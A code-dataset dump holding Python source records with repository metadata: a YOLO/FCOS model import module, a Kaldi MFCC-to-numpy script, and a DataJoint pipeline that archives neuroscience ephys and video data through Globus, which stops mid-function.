#!/usr/bin/env python3 # -*- coding:utf-8 -*- # Copyright (c) 2014-2021 Megvii Inc. All rights reserved. from .backbones.darknet import CSPDarknet, Darknet from .backbones.resnet_vd import Resnet18Vd, Resnet50Vd from .backbones.resnet_vb import Resnet50Vb from .losses.yolov3_loss import YOLOv3Loss from .losses.losses import IOUloss from .losses.iou_losses import MyIOUloss, IouLoss, IouAwareLoss from .losses.fcos_loss import FCOSLoss from .heads.yolov3_head import YOLOv3Head from .heads.yolox_head import YOLOXHead from .heads.fcos_head import FCOSHead from .necks.yolo_pafpn import YOLOPAFPN from .necks.yolo_fpn import YOLOFPN from .necks.fpn import FPN from .architectures.yolo import PPYOLO from .architectures.yolox import YOLOX from .architectures.fcos import FCOS
27.034483
63
0.811224
#!/usr/bin/env python3 # -*- coding:utf-8 -*- # Copyright (c) 2014-2021 Megvii Inc. All rights reserved. from .backbones.darknet import CSPDarknet, Darknet from .backbones.resnet_vd import Resnet18Vd, Resnet50Vd from .backbones.resnet_vb import Resnet50Vb from .losses.yolov3_loss import YOLOv3Loss from .losses.losses import IOUloss from .losses.iou_losses import MyIOUloss, IouLoss, IouAwareLoss from .losses.fcos_loss import FCOSLoss from .heads.yolov3_head import YOLOv3Head from .heads.yolox_head import YOLOXHead from .heads.fcos_head import FCOSHead from .necks.yolo_pafpn import YOLOPAFPN from .necks.yolo_fpn import YOLOFPN from .necks.fpn import FPN from .architectures.yolo import PPYOLO from .architectures.yolox import YOLOX from .architectures.fcos import FCOS
0
0
0
0468d6c246b239a4fae46a385cc87c22edb5790e
282
py
Python
egs/voxceleb/v2.voxceleb1/scp_ark2npy.py
zeek-han/kaldi
e3ed0812db7abd3c266d5616babfd0adff8260ac
[ "Apache-2.0" ]
null
null
null
egs/voxceleb/v2.voxceleb1/scp_ark2npy.py
zeek-han/kaldi
e3ed0812db7abd3c266d5616babfd0adff8260ac
[ "Apache-2.0" ]
null
null
null
egs/voxceleb/v2.voxceleb1/scp_ark2npy.py
zeek-han/kaldi
e3ed0812db7abd3c266d5616babfd0adff8260ac
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python import numpy as np import kaldiio id2mfcc = kaldiio.load_scp('/home/sangjik/kaldi/egs/voxceleb/v2.smallest/mfcc/raw_mfcc_train.10.scp') for utt_id, mfcc in id2mfcc.items(): #print(utt_id, mfcc.shape) np.save('./tmp_mfcc/{}.npy'.format(utt_id), mfcc)
28.2
101
0.72695
#!/usr/bin/env python import numpy as np import kaldiio id2mfcc = kaldiio.load_scp('/home/sangjik/kaldi/egs/voxceleb/v2.smallest/mfcc/raw_mfcc_train.10.scp') for utt_id, mfcc in id2mfcc.items(): #print(utt_id, mfcc.shape) np.save('./tmp_mfcc/{}.npy'.format(utt_id), mfcc)
0
0
0
b75db27a80b0122a92a95241b891c75aed56b87b
38,348
py
Python
pipeline/publication.py
Yi-61/map-ephys
8eacd84f67678b05bcc379c7d5a9560ea7a87e46
[ "MIT" ]
null
null
null
pipeline/publication.py
Yi-61/map-ephys
8eacd84f67678b05bcc379c7d5a9560ea7a87e46
[ "MIT" ]
null
null
null
pipeline/publication.py
Yi-61/map-ephys
8eacd84f67678b05bcc379c7d5a9560ea7a87e46
[ "MIT" ]
null
null
null
import logging import pathlib import re import os from fnmatch import fnmatch from textwrap import dedent from collections import defaultdict import datajoint as dj from . import lab from . import experiment from . import ephys from . import tracking from .ingest.tracking import TrackingIngest from pipeline.globus import GlobusStorageManager from . import get_schema_name PUBLICATION_TRANSFER_TIMEOUT = 10000 schema = dj.schema(get_schema_name('publication')) log = logging.getLogger(__name__) __all__ = [experiment, ephys] @schema class GlobusStorageLocation(dj.Lookup): """ globus storage locations """ definition = """ globus_alias: varchar(32) # name for location (e.g. 'raw-ephys') --- globus_endpoint: varchar(255) # globus endpoint (user#endpoint) globus_path: varchar(1024) # unix-style path within endpoint """ @property @classmethod def local_endpoint(cls, globus_alias=None): ''' return local endpoint for globus_alias from dj.config expects: globus.local_endpoints: { globus_alias: { 'endpoint': uuid, # UUID of local endpoint 'endpoint_subdir': str, # unix-style path within endpoint 'endpoint_path': str # corresponding local path } ''' le = dj.config.get('custom', {}).get('globus.local_endpoints', None) if le is None or globus_alias not in le: raise dj.DataJointError( "globus_local_endpoints for {} not configured".format( globus_alias)) return le[globus_alias] @schema @schema @schema @schema @schema @schema @schema class ArchivedTrackingVideo(dj.Imported): ''' ArchivedTrackingVideo storage Note: video_file_name tracked here as trial->file map is non-deterministic Directory locations of the form: {Water restriction number}\{Session Date}\video with file naming convention of the form: {Water restriction number}_{camera-position-string}_NNN-NNNN.avi Where 'NNN' is determined from the 'tracking map file' which maps trials to videos as outlined in tracking.py XXX: Using key-source based loookup as is currently done, may have trials for which there is no tracking, so camera cannot be determined to do file lookup, thus videos are missed. This could be resolved via schema adjustment, or file-traversal based 'opportunistic' registration strategy. ''' definition = """ -> ArchivedSession -> tracking.TrackingDevice --- -> DataSet """ key_source = tracking.TrackingDevice * experiment.Session ingest = None # ingest module reference gsm = None # for GlobusStorageManager @classmethod def get_ingest(cls): ''' return tracking_ingest module not imported globally to prevent ingest schema creation for client case ''' log.debug('ArchivedVideoFile.get_ingest()') if cls.ingest is None: from .ingest import tracking as tracking_ingest cls.ingest = tracking_ingest return cls.ingest @classmethod def discover(cls): """ discover files on globus and attempt to register them """ self = cls() globus_alias = 'raw-video' le = GlobusStorageLocation.local_endpoint(globus_alias) lep, lep_sub, lep_dir = (le['endpoint'], le['endpoint_subdir'], le['endpoint_path']) ra, rep, rep_sub = (GlobusStorageLocation() & {'globus_alias': globus_alias}).fetch1().values() smap = {'{}/{}'.format(s['water_restriction_number'], s['session_date']).replace('-', ''): s for s in (experiment.Session() * (lab.WaterRestriction() * lab.Subject.proj()))} tpos_dev = {s['tracking_position']: s['tracking_device'] for s in tracking.TrackingDevice()} # position:device ftmap = {t['file_type']: t for t in (FileType() & "file_type like 'tracking%%'")} skey = None sskip = set() sfiles = [] # {file_subpath:, trial:, file_type:,} gsm = self.get_gsm() gsm.activate_endpoint(lep) gsm.activate_endpoint(rep) for ep, dirname, node in gsm.fts('{}:{}'.format(rep, rep_sub)): vdir = re.match('([a-z]+[0-9]+)/([0-9]{8})/video', dirname) if not vdir or node['DATA_TYPE'] != 'file': continue h2o, sdate = vdir[1], vdir[2] skey_i = '{}/{}'.format(h2o, sdate) if skey_i != skey: if skey and skey in smap: with dj.conn().transaction: try: commit(skey, sfiles) except Exception as e: log.error( 'Exception {} committing {}. files: {}'.format( repr(e), skey, sfiles)) skey, sfiles = skey_i, [] if skey not in smap: if skey not in sskip: log.debug('session {} not known. skipping'.format(skey)) sskip.add(skey) continue fname = node['name'] log.debug('checking {}/{}'.format(dirname, fname)) if '.' not in fname: log.debug('skipping {} - no dot in fname'.format(fname)) continue froot, fext = fname.split('.', 1) ftype = {g['file_type']: g for g in ftmap.values() if fnmatch(fname, g['file_glob'])} if len(ftype) != 1: log.debug('skipping {} - incorrect type matches: {}'.format( fname, ftype)) continue ftype = next(iter(ftype.values()))['file_type'] log.debug('processing as {}'.format(ftype)) file_subpath = '{}/{}'.format(dirname, fname) if ftype == 'tracking-video-map': # e.g. dl55_20190108_side.txt h2o_f, fdate, pos = froot.split('_') sfiles.append({'water_restriction_number': h2o, 'session_date': '{}-{}-{}'.format( sdate[:4], sdate[4:6], sdate[6:]), 'position': pos, 'file_subpath': file_subpath, 'file_type': ftype}) else: # tracking-video-map # e.g. dl41_side_998-0000.avi or dl41_side_998-0000_00.avi h2o_f, pos, video = froot.replace('-', '_').split('_')[:3] sfiles.append({'water_restriction_number': h2o, 'session_date': '{}-{}-{}'.format( sdate[:4], sdate[4:6], sdate[6:]), 'position': pos, 'video': int(video), 'file_subpath': file_subpath, 'file_type': ftype}) def make(self, key): """ discover files in local endpoint and transfer/register """ log.info('ArchivedVideoFile.make(): {}'.format(key)) # {'tracking_device': 'Camera 0', 'subject_id': 432572, 'session': 1} globus_alias = 'raw-video' le = GlobusStorageLocation.local_endpoint(globus_alias) lep, lep_sub, lep_dir = (le['endpoint'], le['endpoint_subdir'], le['endpoint_path']) re = (GlobusStorageLocation & {'globus_alias': globus_alias}).fetch1() rep, rep_sub = re['globus_endpoint'], re['globus_path'] log.info('local_endpoint: {}:{} -> {}'.format(lep, lep_sub, lep_dir)) log.info('remote_endpoint: {}:{}'.format(rep, rep_sub)) h2o = (lab.WaterRestriction & key).fetch1('water_restriction_number') session = (experiment.Session & key).fetch1() sdate = session['session_date'] sdate_sml = "{}{:02d}{:02d}".format(sdate.year, sdate.month, sdate.day) dev = (tracking.TrackingDevice & key).fetch1() trls = (experiment.SessionTrial & key).fetch( order_by='trial', as_dict=True) tracking_ingest = self.get_ingest() tdev = dev['tracking_device'] # NOQA: notused tpos = dev['tracking_position'] camtrial = '{}_{}_{}.txt'.format(h2o, sdate_sml, tpos) vbase = pathlib.Path(lep_dir, h2o, sdate_sml, 'video') campath = vbase / camtrial if not campath.exists(): # XXX: uses 1st found log.warning('trial map {} n/a! skipping.'.format(campath)) return log.info('loading trial map: {}'.format(campath)) vmap = {v: k for k, v in tracking_ingest.TrackingIngest.load_campath(campath).items()} log.debug('loaded video map: {}'.format(vmap)) # add ArchivedSession as_key = {k: v for k, v in key.items() if k in experiment.Session.primary_key} as_rec = {**as_key, 'globus_alias': globus_alias} ArchivedSession.insert1(as_rec, allow_direct_insert=True, skip_duplicates=True) # add DataSet ds_type = 'tracking-video' ds_name = '{}_{}_{}_{}'.format(h2o, sdate.isoformat(), ds_type, tpos) ds_key = {'globus_alias': globus_alias, 'dataset_name': ds_name} ds_rec = {**ds_key, 'dataset_type': ds_type} DataSet.insert1(ds_rec, allow_direct_insert=True) # add ArchivedVideoTracking vt_key = {**as_key, 'tracking_device': tdev} vt_rec = {**vt_key, 'globus_alias': globus_alias, 'dataset_name': ds_name} self.insert1(vt_rec) filetype = 'tracking-video-trial' for t in trls: trial = t['trial'] log.info('.. tracking trial {} ({})'.format(trial, t)) if t['trial'] not in vmap: log.warning('trial {} not in video map. skipping!'.format(t)) continue vmatch = '{}_{}_{}-*'.format(h2o, tpos, vmap[trial]) log.debug('vbase: {}, vmatch: {}'.format(vbase, vmatch)) vglob = list(vbase.glob(vmatch)) if len(vglob) != 1: emsg = 'incorrect videos found in {}: {}'.format(vbase, vglob) log.warning(emsg) raise dj.DataJointError(emsg) vfile = vglob[0].name gfile = '{}/{}/{}/{}'.format( h2o, sdate_sml, 'video', vfile) # subpath srcp = '{}:{}/{}'.format(lep, lep_sub, gfile) # source path dstp = '{}:{}/{}'.format(rep, rep_sub, gfile) # dest path gsm = self.get_gsm() gsm.activate_endpoint(lep) # XXX: cache / prevent duplicate RPC? gsm.activate_endpoint(rep) # XXX: cache / prevent duplicate RPC? log.info('transferring {} to {}'.format(srcp, dstp)) if not gsm.cp(srcp, dstp): emsg = "couldn't transfer {} to {}".format(srcp, dstp) log.error(emsg) raise dj.DataJointError(emsg) pf_key = {**ds_key, 'file_subpath': vfile} pf_rec = {**pf_key, 'file_type': filetype} DataSet.PhysicalFile.insert1({**pf_rec}, allow_direct_insert=True) trk_key = {k: v for k, v in {**key, 'trial': trial}.items() if k in experiment.SessionTrial.primary_key} tv_rec = {**vt_key, **trk_key, **pf_key} self.TrialVideo.insert1({**tv_rec}) def test_flist(fname='globus-index-full.txt'): ''' spoof tester for discover methods expects: f: ep:/path/to/file d: ep:/path/to/direct etc. (aka: globus-shell 'find' output) replace the line: for ep, dirname, node in gsm.fts('{}:{}'.format(rep, rep_sub)): with: for ep, dirname, node in test_flist('globus-list.txt'): to test against the file 'globus-list.txt' ''' with open(fname, 'r') as infile: for l in infile: try: t, fp = l.split(' ') fp = fp.split(':')[1].lstrip('/').rstrip('\n') dn, bn = os.path.split(fp) if t == 'f:': yield ('ep', dn, {'DATA_TYPE': 'file', 'name': bn}) else: yield ('ep', dn, {'DATA_TYPE': 'dunno', 'path': bn}) except ValueError as e: if 'too many values' in repr(e): pass
34.861818
80
0.49854
import logging import pathlib import re import os from fnmatch import fnmatch from textwrap import dedent from collections import defaultdict import datajoint as dj from . import lab from . import experiment from . import ephys from . import tracking from .ingest.tracking import TrackingIngest from pipeline.globus import GlobusStorageManager from . import get_schema_name PUBLICATION_TRANSFER_TIMEOUT = 10000 schema = dj.schema(get_schema_name('publication')) log = logging.getLogger(__name__) __all__ = [experiment, ephys] @schema class GlobusStorageLocation(dj.Lookup): """ globus storage locations """ definition = """ globus_alias: varchar(32) # name for location (e.g. 'raw-ephys') --- globus_endpoint: varchar(255) # globus endpoint (user#endpoint) globus_path: varchar(1024) # unix-style path within endpoint """ @property def contents(self): custom = dj.config.get('custom', None) if custom and 'globus.storage_locations' in custom: # test config return custom['globus.storage_locations'] return (('raw-ephys', '5b875fda-4185-11e8-bb52-0ac6873fc732', '/'), ('raw-video', '5b875fda-4185-11e8-bb52-0ac6873fc732', '/'),) @classmethod def local_endpoint(cls, globus_alias=None): ''' return local endpoint for globus_alias from dj.config expects: globus.local_endpoints: { globus_alias: { 'endpoint': uuid, # UUID of local endpoint 'endpoint_subdir': str, # unix-style path within endpoint 'endpoint_path': str # corresponding local path } ''' le = dj.config.get('custom', {}).get('globus.local_endpoints', None) if le is None or globus_alias not in le: raise dj.DataJointError( "globus_local_endpoints for {} not configured".format( globus_alias)) return le[globus_alias] @schema class ArchivedSession(dj.Imported): definition = """ -> experiment.Session --- -> GlobusStorageLocation """ @schema class DataSetType(dj.Lookup): definition = """ dataset_type: varchar(64) """ contents = zip(['ephys-raw-trialized', 'ephys-raw-continuous', 'ephys-sorted', 'tracking-video']) @schema class FileType(dj.Lookup): definition = """ file_type: varchar(32) # file type short name --- file_glob: varchar(64) # file match pattern file_descr: varchar(255) # file type long description """ @property def contents(self): data = [('ephys-raw-3a-ap-trial', '*_g0_t[0-9]*.imec.ap.bin', ''' 3A Probe per-trial AP channels high pass filtered at 300Hz and sampled at 30kHz - recording file '''), ('ephys-raw-3a-ap-trial-meta', '*_g0_t[0-9]*.imec.ap.meta', ''' 3A Probe per-trial AP channels high pass filtered at 300Hz and sampled at 30kHz - file metadata '''), ('ephys-raw-3a-lf-trial', '*_g0_t[0-9]*.imec.lf.bin', ''' 3A Probe per-trial AP channels low pass filtered at 300Hz and sampled at 2.5kHz - recording file '''), ('ephys-raw-3a-lf-trial-meta', '*_g0_t[0-9]*.imec.lf.meta', ''' 3A Probe per-trial AP channels low pass filtered at 300Hz and sampled at 2.5kHz - file metadata '''), ('ephys-raw-3b-ap-trial', '*_????????_g?_t[0-9]*.imec.ap.bin', ''' 3B Probe per-trial AP channels high pass filtered at 300Hz and sampled at 30kHz - recording file '''), ('ephys-raw-3b-ap-trial-meta', '*_????????_g?_t[0-9]*.imec.ap.meta', ''' 3B Probe per-trial AP channels high pass filtered at 300Hz and sampled at 30kHz - file metadata '''), ('ephys-raw-3b-lf-trial', '*_????????_g?_t[0-9]*.imec.lf.bin', ''' 3B Probe per-trial AP channels low pass filtered at 300Hz and sampled at 2.5kHz - recording file '''), ('ephys-raw-3b-lf-trial-meta', '*_????????_g?_t[0-9]*.imec.lf.meta', ''' 3B Probe per-trial AP channels low pass filtered at 300Hz and sampled at 2.5kHz - file metadata '''), ('ephys-raw-3b-ap-concat', '*_????????_g?_tcat.imec.ap.bin', ''' 3B Probe concatenated AP channels high pass filtered at 300Hz and sampled at 30kHz - recording file '''), ('ephys-raw-3b-ap-concat-meta', '*_??????_g?_tcat.imec.ap.meta', ''' 3B Probe concatenated AP channels high pass filtered at 300Hz and sampled at 30kHz - file metadata '''), ('ephys-raw-3b-lf-concat', '*_????????_g?_tcat.imec.lf.bin', ''' 3B Probe concatenated AP channels low pass filtered at 300Hz and sampled at 2.5kHz - recording file '''), ('ephys-raw-3b-lf-concat-meta', '*_????????_g?_tcat.imec.lf.meta', ''' 3B Probe concatenated AP channels low pass filtered at 300Hz and sampled at 2.5kHz - file metadata '''), ('tracking-video-trial', '*_*_[0-9]*-*.[am][vp][i4]', ''' Video Tracking per-trial file at 300fps '''), ('tracking-video-map', '*_????????_*.txt', ''' Video Tracking file-to-trial mapping ''')] return [[dedent(i).replace('\n', ' ').strip(' ') for i in r] for r in data] @schema class DataSet(dj.Manual): definition = """ -> GlobusStorageLocation dataset_name: varchar(128) --- -> DataSetType """ class PhysicalFile(dj.Part): definition = """ -> master file_subpath: varchar(128) --- -> FileType """ @schema class ArchivedRawEphys(dj.Imported): definition = """ -> ArchivedSession -> DataSet probe_folder: tinyint """ key_source = experiment.Session gsm = None # for GlobusStorageManager class RawEphysTrial(dj.Part): """ file:trial mapping if applicable """ definition = """ -> master -> experiment.SessionTrial -> DataSet.PhysicalFile """ def get_gsm(self): log.debug('ArchivedRawEphysTrial.get_gsm()') if self.gsm is None: self.gsm = GlobusStorageManager() self.gsm.wait_timeout = PUBLICATION_TRANSFER_TIMEOUT return self.gsm @classmethod def discover(cls): """ Discover files on globus and attempt to register them. """ self = cls() globus_alias = 'raw-ephys' ra, rep, rep_sub = (GlobusStorageLocation() & {'globus_alias': globus_alias}).fetch1().values() smap = {'{}/{}'.format(s['water_restriction_number'], s['session_date']).replace('-', ''): s for s in (experiment.Session() * (lab.WaterRestriction() * lab.Subject.proj()))} ftmap = {t['file_type']: t for t in (FileType() & "file_type like 'ephys%%'")} skey = None sskip = set() sfiles = [] # {file_subpath:, trial:, file_type:,} def commit(skey, sfiles): log.info('commit. skey: {}, sfiles: {}'.format(skey, sfiles)) if not sfiles: log.info('skipping. no files in set') return h2o, sdate, ftypes = set(), set(), set() ptmap = defaultdict(lambda: defaultdict(list)) # probe:trial:file for s in sfiles: ptmap[s['probe']][s['trial']].append(s) h2o.add(s['water_restriction_number']) sdate.add(s['session_date']) ftypes.add(s['file_type']) if len(h2o) != 1 or len(sdate) != 1: log.info('skipping. bad h2o {} or session date {}'.format( h2o, sdate)) return h2o, sdate = next(iter(h2o)), next(iter(sdate)) {k: {kk: vv for kk, vv in v.items()} for k, v in ptmap.items()} if all('trial' in f for f in ftypes): # DataSet ds_type = 'ephys-raw-trialized' ds_name = '{}_{}_{}'.format(h2o, sdate, ds_type) ds_key = {'dataset_name': ds_name, 'globus_alias': globus_alias} if (DataSet & ds_key): log.info('DataSet: {} already exists. Skipping.'.format( ds_key)) return DataSet.insert1({**ds_key, 'dataset_type': ds_type}, allow_direct_insert=True) # ArchivedSession as_key = {k: v for k, v in smap[skey].items() if k in ArchivedSession.primary_key} ArchivedSession.insert1( {**as_key, 'globus_alias': globus_alias}, allow_direct_insert=True, skip_duplicates=True) for p in ptmap: # ArchivedRawEphys ep_key = {**as_key, **ds_key, 'probe_folder': p} ArchivedRawEphys.insert1(ep_key, allow_direct_insert=True) for t in ptmap[p]: for f in ptmap[p][t]: DataSet.PhysicalFile.insert1( {**ds_key, **f}, allow_direct_insert=True, ignore_extra_fields=True) ArchivedRawEphys.RawEphysTrial.insert1( {**ep_key, **ds_key, 'trial': t, 'file_subpath': f['file_subpath']}, allow_direct_insert=True) elif all('concat' in f for f in ftypes): raise NotImplementedError('concatenated not yet implemented') else: log.info('skipping. mixed filetypes detected') return gsm = self.get_gsm() gsm.activate_endpoint(rep) for ep, dirname, node in gsm.fts('{}:{}'.format(rep, rep_sub)): log.debug('checking: {}:{}/{}'.format( ep, dirname, node.get('name', ''))) edir = re.match('([a-z]+[0-9]+)/([0-9]{8})/([0-9]+)', dirname) if not edir or node['DATA_TYPE'] != 'file': continue log.debug('dir match: {}'.format(dirname)) h2o, sdate, probe = edir[1], edir[2], edir[3] skey_i = '{}/{}'.format(h2o, sdate) if skey_i != skey: if skey and skey in smap: with dj.conn().transaction: try: commit(skey, sfiles) except Exception as e: log.error( 'Exception {} committing {}. files: {}'.format( repr(e), skey, sfiles)) skey, sfiles = skey_i, [] if skey not in smap: if skey not in sskip: log.debug('session {} not known. skipping.'.format(skey)) sskip.add(skey) continue fname = node['name'] log.debug('found file {}'.format(fname)) if '.' not in fname: log.debug('skipping {} - no dot in fname'.format(fname)) continue froot, fext = fname.split('.', 1) ftype = {g['file_type']: g for g in ftmap.values() if fnmatch(fname, g['file_glob'])} if len(ftype) != 1: log.debug('skipping {} - incorrect type matches: {}'.format( fname, ftype)) continue ftype = next(iter(ftype.values()))['file_type'] trial = None if 'trial' in ftype: trial = int(froot.split('_t')[1]) file_subpath = '{}/{}'.format(dirname, fname) sfiles.append({'water_restriction_number': h2o, 'session_date': '{}-{}-{}'.format( sdate[:4], sdate[4:6], sdate[6:]), 'probe': int(probe), 'trial': int(trial), 'file_subpath': file_subpath, 'file_type': ftype}) if skey: with dj.conn().transaction: commit(skey, sfiles) def make(self, key): """ discover files in local endpoint and transfer/register """ log.debug(key) globus_alias = 'raw-ephys' le = GlobusStorageLocation.local_endpoint(globus_alias) lep, lep_sub, lep_dir = (le['endpoint'], le['endpoint_subdir'], le['endpoint_path']) re, rep, rep_sub = (GlobusStorageLocation() & {'globus_alias': globus_alias}).fetch1().values() log.info('local_endpoint: {}:{} -> {}'.format(lep, lep_sub, lep_dir)) # Get session related information needed for filenames/records sinfo = (lab.WaterRestriction * lab.Subject.proj() * experiment.Session() & key).fetch1() tinfo = ((lab.WaterRestriction * lab.Subject.proj() * experiment.Session() * experiment.SessionTrial) & key).fetch() h2o = sinfo['water_restriction_number'] sdate = sinfo['session_date'] subdir = pathlib.Path(h2o, str(sdate).replace('-', '')) # + probeno lep_subdir = pathlib.Path(lep_dir, subdir) probechoice = [str(i) for i in range(1, 10)] # XXX: hardcoded file_globs = {i['file_glob']: i['file_type'] for i in FileType & "file_type like 'ephys%%'"} # Process each probe folder for lep_probedir in lep_subdir.glob('*'): lep_probe = str(lep_probedir.relative_to(lep_subdir)) if lep_probe not in probechoice: log.info('skipping lep_probedir: {} - unexpected name'.format( lep_probedir)) continue lep_matchfiles = {} lep_probefiles = lep_probedir.glob('*.*') for pf in lep_probefiles: pfbase = pf.relative_to(lep_probedir) pfmatch = {k: pfbase.match(k) for k in file_globs} if any(pfmatch.values()): log.debug('found valid file: {}'.format(pf)) lep_matchfiles[pf] = tuple(k for k in pfmatch if pfmatch[k]) else: log.debug('skipping non-match file: {}'.format(pf)) continue # Build/Validate file records if not all([len(lep_matchfiles[i]) == 1 for i in lep_matchfiles]): # TODO: handle trial + concatenated match case... log.warning('files matched multiple types'.format( lep_matchfiles)) continue type_to_file = {file_globs[lep_matchfiles[mf][0]]: mf for mf in lep_matchfiles} ds_key, ds_name, ds_files, ds_trials = ( None, None, None, [], []) if all(['trial' in t for t in type_to_file]): dataset_type = 'ephys-raw-trialized' ds_name = '{}_{}_{}'.format(h2o, sdate.isoformat(), dataset_type) ds_key = {'dataset_name': ds_name, 'globus_storage_location': globus_alias} for t in type_to_file: fsp = type_to_file[t].relative_to(lep_dir) dsf = {**ds_key, 'file_subpath': str(fsp)} # e.g : 'tw34_g0_t0.imec.ap.meta' -> *_t(trial).* trial = int(fsp.name.split('_t')[1].split('.')[0]) if trial not in tinfo['trial']: log.warning('unknown trial file: {}. skipping'.format( dsf)) continue ds_trials.append({**dsf, 'trial': trial}) ds_files.append({**dsf, 'file_type': t}) elif all(['concat' in t for t in type_to_file]): dataset_type = 'ephys-raw-continuous' ds_name = '{}_{}_{}'.format(h2o, sdate.isoformat(), dataset_type) ds_key = {'dataset_name': ds_name, 'globus_storage_location': globus_alias} for t in type_to_file: fsp = type_to_file[t].relative_to(lep_dir) ds_files.append({**ds_key, 'file_subpath': str(fsp), 'file_type': t}) else: log.warning("couldn't determine dataset type for {}".format( lep_probedir)) continue # Transfer Files gsm = self.get_gsm() gsm.activate_endpoint(lep) # XXX: cache / prevent duplicate RPC? gsm.activate_endpoint(rep) # XXX: cache / prevent duplicate RPC? DataSet.insert1({**ds_key, 'dataset_type': dataset_type}, allow_direct_insert=True) for f in ds_files: fsp = ds_files[f]['file_subpath'] srcp = '{}:{}/{}'.format(lep, lep_sub, fsp) dstp = '{}:{}/{}'.format(rep, rep_sub, fsp) log.info('transferring {} to {}'.format(srcp, dstp)) # XXX: check if exists 1st? if not gsm.cp(srcp, dstp): emsg = "couldn't transfer {} to {}".format(srcp, dstp) log.error(emsg) raise dj.DataJointError(emsg) DataSet.PhysicalFile.insert1({**ds_key, **ds_files[f]}, allow_direct_insert=True) # Add Records ArchivedSession.insert1( {**key, 'globus_storage_location': globus_alias}, skip_duplicates=True, allow_direct_insert=True) ArchivedRawEphys.insert1( {**key, **ds_key, 'probe_folder': int(str(lep_probe))}, allow_direct_insert=True) if dataset_type == 'ephys-raw-trialized': ArchivedRawEphys.ArchivedTrials.insert( [{**key, **t} for t in ds_trials], allow_direct_insert=True) @classmethod def retrieve(cls): self = cls() for key in self: self.retrieve1(key) @classmethod def retrieve1(cls, key): ''' retrieve related files for a given key ''' self = cls() raise NotImplementedError('retrieve not yet implemented') # Old / to be updated: # >>> list(key.keys()) # ['subject_id', 'session', 'trial', 'electrode_group', 'globus_alia log.debug(key) lep, lep_sub, lep_dir = GlobusStorageLocation().local_endpoint log.info('local_endpoint: {}:{} -> {}'.format(lep, lep_sub, lep_dir)) # get session related information needed for filenames/records sinfo = ((lab.WaterRestriction * lab.Subject.proj() * experiment.Session() * experiment.SessionTrial) & key).fetch1() h2o = sinfo['water_restriction_number'] sdate = sinfo['session_date'] eg = key['electrode_group'] trial = key['trial'] # build file locations: # fpat: base file pattern for this sessions files # gbase: globus-url base path for this sessions files fpat = '{}_{}_{}_g0_t{}'.format(h2o, sdate, eg, trial) gbase = '/'.join((h2o, str(sdate), str(eg), fpat)) repname, rep, rep_sub = (GlobusStorageLocation() & key).fetch()[0] gsm = self.get_gsm() gsm.activate_endpoint(lep) # XXX: cache this / prevent duplicate RPC? gsm.activate_endpoint(rep) # XXX: cache this / prevent duplicate RPC? sfxmap = {'.imec.ap.bin': ArchivedRawEphysTrial.ArchivedApChannel, '.imec.ap.meta': ArchivedRawEphysTrial.ArchivedApMeta, '.imec.lf.bin': ArchivedRawEphysTrial.ArchivedLfChannel, '.imec.lf.meta': ArchivedRawEphysTrial.ArchivedLfMeta} for sfx, cls in sfxmap.items(): if cls & key: log.debug('record found for {} & {}'.format(cls.__name__, key)) gname = '{}{}'.format(gbase, sfx) srcp = '{}:/{}/{}'.format(rep, rep_sub, gname) dstp = '{}:/{}/{}'.format(lep, lep_sub, gname) log.info('transferring {} to {}'.format(srcp, dstp)) # XXX: check if exists 1st? (manually or via API copy-checksum) if not gsm.cp(srcp, dstp): emsg = "couldn't transfer {} to {}".format(srcp, dstp) log.error(emsg) raise dj.DataJointError(emsg) @schema class ArchivedSortedEphys(dj.Imported): definition = """ -> ArchivedSession -> DataSet probe_folder: tinyint --- sorting_time=null: datetime """ key_source = experiment.Session def make(self, key): """ discover files in local endpoint and transfer/register """ raise NotImplementedError('ArchivedSortedEphys.make to be implemented') @schema class ArchivedTrackingVideo(dj.Imported): ''' ArchivedTrackingVideo storage Note: video_file_name tracked here as trial->file map is non-deterministic Directory locations of the form: {Water restriction number}\{Session Date}\video with file naming convention of the form: {Water restriction number}_{camera-position-string}_NNN-NNNN.avi Where 'NNN' is determined from the 'tracking map file' which maps trials to videos as outlined in tracking.py XXX: Using key-source based loookup as is currently done, may have trials for which there is no tracking, so camera cannot be determined to do file lookup, thus videos are missed. This could be resolved via schema adjustment, or file-traversal based 'opportunistic' registration strategy. ''' definition = """ -> ArchivedSession -> tracking.TrackingDevice --- -> DataSet """ key_source = tracking.TrackingDevice * experiment.Session ingest = None # ingest module reference gsm = None # for GlobusStorageManager class TrialVideo(dj.Part): definition = """ -> master -> experiment.SessionTrial --- -> DataSet.PhysicalFile """ @classmethod def get_ingest(cls): ''' return tracking_ingest module not imported globally to prevent ingest schema creation for client case ''' log.debug('ArchivedVideoFile.get_ingest()') if cls.ingest is None: from .ingest import tracking as tracking_ingest cls.ingest = tracking_ingest return cls.ingest def get_gsm(self): log.debug('ArchivedVideoFile.get_gsm()') if self.gsm is None: self.gsm = GlobusStorageManager() self.gsm.wait_timeout = PUBLICATION_TRANSFER_TIMEOUT return self.gsm @classmethod def discover(cls): """ discover files on globus and attempt to register them """ self = cls() globus_alias = 'raw-video' le = GlobusStorageLocation.local_endpoint(globus_alias) lep, lep_sub, lep_dir = (le['endpoint'], le['endpoint_subdir'], le['endpoint_path']) ra, rep, rep_sub = (GlobusStorageLocation() & {'globus_alias': globus_alias}).fetch1().values() smap = {'{}/{}'.format(s['water_restriction_number'], s['session_date']).replace('-', ''): s for s in (experiment.Session() * (lab.WaterRestriction() * lab.Subject.proj()))} tpos_dev = {s['tracking_position']: s['tracking_device'] for s in tracking.TrackingDevice()} # position:device ftmap = {t['file_type']: t for t in (FileType() & "file_type like 'tracking%%'")} skey = None sskip = set() sfiles = [] # {file_subpath:, trial:, file_type:,} gsm = self.get_gsm() gsm.activate_endpoint(lep) gsm.activate_endpoint(rep) def commit(skey, sfiles): log.info('commit. skey: {}'.format(skey)) if not sfiles: log.info('commit skipping {}. no files in set'.format(skey)) # log.debug('sfiles: {}'.format(sfiles)) h2o, sdate, ftypes = set(), set(), set() dftmap = {} # device:file:trial via load_campath mapping files dvfmap = defaultdict(lambda: defaultdict(list)) # device:video:file dtfmap = defaultdict(lambda: defaultdict(list)) # device:trial:file for s in sfiles: if s['file_type'] == 'tracking-video-trial': dvfmap[s['position']][s['video']].append(s) h2o.add(s['water_restriction_number']) sdate.add(s['session_date']) ftypes.add(s['file_type']) if s['file_type'] == 'tracking-video-map': # xfer & load camera:trial map ex: dl55_20190108_side.txtb fsp = s['file_subpath'] lsp = '/tmp/' + s['file_subpath'].split('/')[-1] srcp = '{}:{}/{}'.format(rep, rep_sub, fsp) dstp = '{}:{}/{}'.format(lep, lep_sub, lsp) 